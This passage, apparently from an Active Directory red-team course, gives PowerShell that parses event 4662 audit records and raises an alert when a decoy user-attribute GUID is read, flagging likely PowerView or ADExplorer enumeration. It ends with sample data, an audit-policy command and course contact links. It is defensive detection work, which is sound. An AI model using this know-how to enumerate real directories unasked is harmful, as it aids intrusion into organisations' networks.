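        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Time       = $Event.TimeCreated
            Subject    = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
            ObjectName = $d.ObjectName
            Properties = $d.Properties        # list of property / property-set GUIDs that were accessed
            AccessMask = $d.AccessMask
        }
    }
}

function Find-DecoyAccess {
    # Emits an alert object for every record whose accessed-properties list contains the decoy GUID.
    param([Parameter(ValueFromPipeline)]$Record)
    process {
        if ($Record.Properties -match [regex]::Escape($DecoyPropertyGuid)) {
            [pscustomobject]@{
                Time       = $Record.Time
                Subject    = $Record.Subject
                Object     = $Record.ObjectName
                AccessMask = $Record.AccessMask
                Alert      = 'decoy user attribute read: LDAP enumeration (PowerView / ADExplorer style) likely'
            }
        }
    }
}

# Constructed sample records in the shape ConvertFrom-DsAccessEvent produces.
# bf967aba-0de6-11d0-a285-00aa003049e2 is the schema GUID of the user class; the
# first record also lists the decoy property GUID, the second does not.
$SampleRecords = @(
    [pscustomobject]@{ Time = '2024-01-10 10:02'; Subject = 'CORP\bob';        ObjectName = 'CN=user manager,CN=Users,DC=corp,DC=local'
                       Properties = "{bf967aba-0de6-11d0-a285-00aa003049e2}`n`t{d07da11f-8a3d-42b6-b0aa-76c962be719a}"; AccessMask = '0x10' }
    [pscustomobject]@{ Time = '2024-01-10 10:05'; Subject = 'CORP\svc-backup'; ObjectName = 'CN=user manager,CN=Users,DC=corp,DC=local'
                       Properties = "{bf967aba-0de6-11d0-a285-00aa003049e2}"; AccessMask = '0x10' }
)
# Expected: one alert, for CORP\bob.
$SampleRecords | Find-DecoyAccess | Format-Table -AutoSize

# Live, run against a DC once "Audit Directory Service Access" success auditing is on
# (the local equivalent of the Group Policy setting named on the previous slide is:
#   auditpol /set /subcategory:"Directory Service Access" /success:enable):
# Get-WinEvent -ComputerName DC01 -FilterHashtable @{ LogName = 'Security'; Id = 4662 } |
#     ConvertFrom-DsAccessEvent | Find-DecoyAccess
```

Because the slide states that net.exe, WMI and the ActiveDirectory module never read this property, the rule needs no allow-list of expected readers: every hit is worth a look, and the Subject field tells you which account is enumerating.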




Thank you
• Please provide feedback.
• Follow me @nikhil_mitt
[email protected]
• For other red team labs: https://www.alteredsecurity.com/online-labs
• For bootcamps: https://www.alteredsecurity.com/bootcamps
• For lab extension/access/support, please contact: [email protected]
• Discord (Claim crtp-enrolled role to access the dedicated channel) -
https://discord.com/invite/vcEwaRMwJe